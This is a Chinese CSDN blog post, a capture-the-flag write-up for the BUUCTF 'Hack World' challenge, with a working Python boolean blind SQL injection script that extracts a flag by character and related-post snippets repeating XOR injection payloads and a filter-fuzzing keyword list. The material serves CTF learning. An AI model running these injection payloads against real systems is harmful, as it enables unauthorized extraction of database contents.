buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp

最新推荐文章于 2023-04-13 23:24:59 发布
最新推荐文章于 2023-04-13 23:24:59 发布
阅读量314 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/119571817
版权

[CISCN2019 华北赛区 Day2 Web1]Hack World

知识点

  • fuzz
  • python盲注脚本

过程

fuzz一哈

一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等

贴上脚本:

import requests

url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php"

result = ""
num = 0  # 用了来判断是不是flag已经拼完整了
for i in range(1, 60):

    if num == 1:
        break

    for j in range(32, 128):

        payload = "if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)" % (i, j)
        # print(str((i-1)*96+j-32)+":~"+payload+"~")

        data = {
            "id": payload,
        }

        r = requests.post(url, data=data)

        r.encoding = r.apparent_encoding

        if "Hello" in r.text:
            x = chr(j)
            result += str(x)
            print(result)
            break

        if "}" in result:
            print(result)
            num = 1
            break
居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qi_SJQ_的博客
10-29 271
拿到一道sql注入题思路: 测试过滤:可以bp加字典fuzzing一下,看过滤哪些字符: 找的大佬的fuzzing字典: ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } | \ ; : ' " , . < > / ? -- --+ /**/ && || <> !(<>) and or xor if not select sleep union from where order by concat group b
BUUCTF__web题解合集(五)
风过江南乱的博客
08-10 1007
1、[BJDCTF2020]The mystery of ip 2、[BJDCTF2020]Cookie is so stable 3、[WesternCTF2018]shrine 4、[BJDCTF2020]ZJCTF,不过如此 5、[CISCN 2019 初赛]Love Math
(未完成版)Hack World
m0_75178803的博客
04-13 78
Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试;输入字符时的boo提示,那这里就得考虑布尔注入。在cmd界面安装requests库的前提下。用python执行脚本得到flag。
buuctfhack world wp
m0_55185160的博客
08-16 329
打开网页我们可以得到表名和列名都为flag 在输入框内输入1得到 输入2得到 输入3时 发现报错于是尝试注入 1 union select 1,2 发现受限制我们进行一个fuzz测试 长度为460的都是被过滤的 看了大佬的方法发现这里运用sql三目运算 if(表达式1,表达式2,表达式3)如果表达式1正确,执行表达式2,否则执行表达式3 if(ascil(substr((select(flag)from(flag)),%d,1))>%d,1,2)''%(x,mid) 用大佬的...
[CISCN2019 华北赛区 Day2 Web1]Hack World -wp
freerats的博客
06-27 251
可以在页面上看到提示,flag在flag表flag列里 在查询0,1,2时会获得不同的回显, 0回显:Error Occured When Fetch Result. 1:Hello, glzjin wants a girlfriend 2:Do you want to be my girlfriend? 初步判断0字段应该不存在,1,2存在 尝试输入or时发现被ban,我们可以fuzz一下 长为482的都是不允许的 可以发现select,from,where这些常用注入字符都可以使用 题目过滤了双引号,导
[CISCN2019 华北赛区 Day2 Web1]Hack World(排坑
weixin_45751765的博客
09-28 1360
0x00 前言 惭愧,好像是第一次做盲注题(之前肯定看过,不深入而已…) 直接看了wp进行复现了 根据特定环境适用的攻击手法,熟悉一下script编写 0x01 复现 贴一下源码方便后续理解 <?php $dbuser='root'; $dbpass='root'; function safe($sql){ #被过滤的内容 函数基本没过滤 $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','i
BUUCTF[CISCN2019 华北赛区 Day2 Web1]Hack World(报错注入)
qq_44657899的博客
03-12 2154
这道题过滤了常用的语句,还过滤了空格和/**/,一番分析之下发现果然我这种菜鸡只能看wp了。 然后学会了一种新的思路 0^(ascii(substr((select(flag)from(flag)),1,1))=ascii('f')) 脚本: import requests import time url='http://76eeac1c-8521-4f23-83f5-9e41b5f7b2d4.n...
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛 2019 华北赛区 Web 题目
最新发布
05-19
ciscn
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
热工自动化概述-华北电力大学.ppt
11-21
热工自动化概述-华北电力大学.ppt
电子与通信工程系-华北电力大学保定研究生院.pdf
11-18
电子与通信工程系-华北电力大学保定研究生院.pdf
Web-异或注入-[CISCN2019 华北赛区 Day2 Web1]Hack World
lunan的博客
04-17 328
Web-异或注入-[CISCN2019 华北赛区 Day2 Web1]Hack World 一、知识点 1、异或注入 爆破法payload构造: payload = {"id":'0^' + '(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))=' + str(j)+')'} 二分法payload构造: 0^(ascii(substr((select(flag)from(flag)),1,1))>1) 用途:可用于判断过滤 htt
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2020
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注 下
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43345082的博客
08-10 4130
一个盲注过滤了很多东西 最后发现这样可以正常回显 id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),sleep(3),1)) 写脚本一位位爆破,二分法找 但是因为平台的问题可能跑到一半会被限制,可以加sleep()时间或者从从下一位继续跑 #!/usr/bin/python #-*-coding:utf-8 -*- import ...
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1729
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
BUUCTF:[BJDCTF2020]ZJCTF,不过如此 && 攻防世界web之ics-05 -- -preg_replace + /e 的任意代码执行漏洞
Zero_Adam的博客
02-13 351
不足: 在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去??? 这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 看到正则+str_replace,+ e 修正符,想到的是RCE!?!!。 知识点:/e模式的preg_repl
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3521
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值